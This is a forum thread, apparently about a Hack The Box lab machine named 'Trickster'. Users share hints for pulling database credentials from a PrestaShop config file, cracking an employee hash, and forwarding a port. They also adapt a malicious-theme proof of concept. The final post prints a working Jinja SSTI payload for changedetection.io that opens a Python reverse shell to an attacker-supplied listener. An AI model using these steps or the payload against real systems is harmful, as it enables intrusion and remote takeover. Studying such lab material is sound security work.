[wtfduw]

You can find db creds under /var/www/prestashop/app/config/parameters.php
connect to mysql
use prestashop
select * from ps_customer;
crack james hash => password:alwaysandforever

Anyone has path for root?

thx budd ................

sure. my pleasure
As for root, port 5000 is exposed for docker 172.17.0.2
it has changedetection.io installed, tried a couple of exploits but nothing. Anyone got anything?

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.

[jsvensson]

You can find db creds under /var/www/prestashop/app/config/parameters.php
connect to mysql
use prestashop
select * from ps_customer;
crack james hash => password:alwaysandforever

Anyone has path for root?

i have 3 hashes in ps_customer, for adam, anonymous and pub - where is hash for james?

[wtfduw]

You can find db creds under /var/www/prestashop/app/config/parameters.php
connect to mysql
use prestashop
select * from ps_customer;
crack james hash => password:alwaysandforever

Anyone has path for root?

i have 3 hashes in ps_customer, for adam, anonymous and pub - where is hash for james?

sorry I meant select * from ps_employee;

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.

[osamy7593]

You can find db creds under /var/www/prestashop/app/config/parameters.php
connect to mysql
use prestashop
select * from ps_customer;
crack james hash => password:alwaysandforever

Anyone has path for root?

thx budd ................

sure. my pleasure
As for root, port 5000 is exposed for docker 172.17.0.2
it has changedetection.io installed, tried a couple of exploits but nothing. Anyone got anything?

yes i see 

james@trickster:/tmp$ curl http://172.17.0.2:5000
<!doctype html>
<html lang=en>
<title>Redirecting...</title>
<h1>Redirecting...</h1>
<p>You should be redirected automatically to the target URL: <a href="/login?next=/">/login?next=/</a>. If not, click the link.
<!doctype html>
<html lang=en>
<title>Redirecting...</title>
<h1>Redirecting...</h1>
<p>You should be redirected automatically to the target URL: <a href="/login?next=/">/login?next=/</a>. If not, click the link.

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Asking for rep is not allowed

[wtfduw]

You can find db creds under /var/www/prestashop/app/config/parameters.php
connect to mysql
use prestashop
select * from ps_customer;
crack james hash => password:alwaysandforever

Anyone has path for root?

thx budd ................

sure. my pleasure
As for root, port 5000 is exposed for docker 172.17.0.2
it has changedetection.io installed, tried a couple of exploits but nothing. Anyone got anything?

yes i see 

james@trickster:/tmp$ curl http://172.17.0.2:5000
<!doctype html>
<html lang=en>
<title>Redirecting...</title>
<h1>Redirecting...</h1>
<p>You should be redirected automatically to the target URL: <a href="/login?next=/">/login?next=/</a>. If not, click the link.
<!doctype html>
<html lang=en>
<title>Redirecting...</title>
<h1>Redirecting...</h1>
<p>You should be redirected automatically to the target URL: <a href="/login?next=/">/login?next=/</a>. If not, click the link.

just forward the port with ssh james@trickster.htb -L 5000:172.17.0.2:5000 to access it

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.

[Str4ngerX]

for POC
there is a couple of things to change:
in zip you have a.php - need a change to yours ip to get shell - but this file must be in zip
in exploit.py - change name of shell.php to /themes/next/a.php
in exploit html:
all admin-dev to admin634ewutrx1jgitlooaj
and in import_theme to yours_ip

I'm still unable to get this working, I'm not able to GET http://shop.trickster.htb/themes/next/a.php, it says forbidden.
I have a.php exploit.html exploit.py ps_next_8_theme_malicious.zip (i've added my ip to a.php inside the zip)

I've made the right modifications but still nothing can't GET that a.php, I'm recieving GET requests at my hosted python web server and it's GETing that zip file successfully.

[Myst]

Can someone give me a hint of what to do at the changedetection login? Tried several exploits but with no luck

[N0tYourK1nd]

Any hints for using CVE-2024-32651? No luck with anything I try currently..

[osamy7593]

0.45.20 ... the CVE is CVE-2024-32651

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Asking for rep is not allowed

[random901]

For triggering launch of Root PoC:

1. start a web-server on the machine "python3 -m http.server 8000"
   
2. On  the changedetect.io site "Add New Change" enter the URL http://172.17.0.1:8000" && "Edit > Watch"
   
3. Set the Notification Url to "get://<attacker-ip>" && the Notification Body to the one from the PoC except change your to your IP & Port
   
   {% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{ x()._module.__builtins__['__import__']('os').popen("python3 -c 'import os,pty,socket;s=socket.socket();s.connect((\"listen_ip\",listen_port));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn(\"/bin/bash\")'").read() }}{% endif %}{% endfor %}
4. Add an index.html file or literally anything && re-check the website from changedetection dashboard. This should trigger the SSTI && get a shell
   

It needs to detect a change && have a Notification URL set in order for the notification body to be triggered.